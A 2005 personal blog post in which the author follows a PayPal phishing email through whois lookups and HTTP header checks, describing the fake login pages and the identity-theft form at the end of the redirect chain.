Another paypal scam / 2005-06-10

2005-06-10 Another paypal scam
On a whim I decided to follow this one..

It linked to
Interesting reply from whois:


But the gtld nameservers are more helpful: name server name server

And it points at: has address

Which is hosted by.. microsoft.

OrgName: Microsoft Corp
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US

NetRange: -
NetHandle: NET-65-52-0-0-1
Parent: NET-65-0-0-0-0
NetType: Direct Assignment

Yeah, I'd like a usable answer to my previous queries.

Anyway. Asking for it:

$ lynx -head -dump
HTTP/1.1 302 Found
Connection: close
Date: Fri, 10 Jun 2005 16:30:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Expires: Sat, 01 Jan 2000 08:00:00 GMT
Content-Type: text/html

Later the forward stopped, but the page at the redirect is still up.

A nice redirect to where they have built a complete mockup
of the paypal login page, with all the right buttons pointing at the right
places at paypal. is at afrinic..

inetnum: -
netname: AVISONET
descr: ISP Cote d'Ivoire
country: CI
admin-c: ZJ59-AFRINIC
tech-c: AE496-AFRINIC

Some ISP in Cote d' Ivoire (sometimes home to a certain kind of people
from Nigeria with interesting financial propositions)

$ lynx -head -dump
HTTP/1.0 200 OK
Date: Fri, 10 Jun 2005 17:03:20 GMT
Server: Apache
Last-Modified: Thu, 05 Aug 2004 16:15:48 GMT
ETag: "341d4-29f6-41125d34"
Accept-Ranges: bytes
Content-Length: 10742
Content-Type: text/html
Age: 17017

The submit is to
which redirects to

This page looks like an 'error in your login data' page and asks for the
same login/password again. Funny is that they forgot to copy a pixel from
paypal or forgot to point at the right one, giving 404 errors and a somewhat
distorted page (in firefox).

$ lynx -head -dump
HTTP/1.0 404 Not Found
Date: Fri, 10 Jun 2005 21:53:46 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1

The page submits the data to

Which redirects to (this is a pattern..)

Which gives an advert for a new 'immediate Paypal payment' option.

Another 'continue' button, which gets (using an 'onload' form)

with a bit about updated terms and conditions (loads of legalese. I did not
check for 'you just gave us access to all your paypal funds, thank you
very much' hidden in there).

And next comes up a page

(hey, I never clicked on one of those 'yes, I agree'
buttons..) asking for every last detail such as social security number,
mother's maiden name, drivers license, credit card number and pin for the
credit card. They do their identity theft seriously!

Oops, forgot to fill in the form. Wow, there is a real check for a CC number
in it (16 digits) and other checks for pin lenght, the works. I was not
in the mood to find nonsense values for those. So I asked for the handler at

which redirected to

which says...

"Your information submitted successfully! Your information will be
reviewed shortly."

And a link to 'paypal home' at the real

Makes me wonder where all that information is sent..

the form name used is 'mailbomber' and a google search for 'paypal' and
'mailbomber' shows that this is a well-known script for paypal account

Tags: , ,

IPv6 check

Running test...
, reachable as PGP encrypted e-mail preferred. PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers

Meningen zijn die van mezelf, wat ik schrijf is beschermd door auteursrecht. Sommige publicaties bevatten een expliciete vermelding dat ze ongevraagd gedeeld mogen worden.
My opinions are my own, what I write is protected by copyrights. Some publications contain an explicit license statement which allows sharing without asking permission.
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated by $Id: newsitem.cgi,v 1.58 2022/12/12 15:34:31 koos Exp $ in 0.008410 seconds.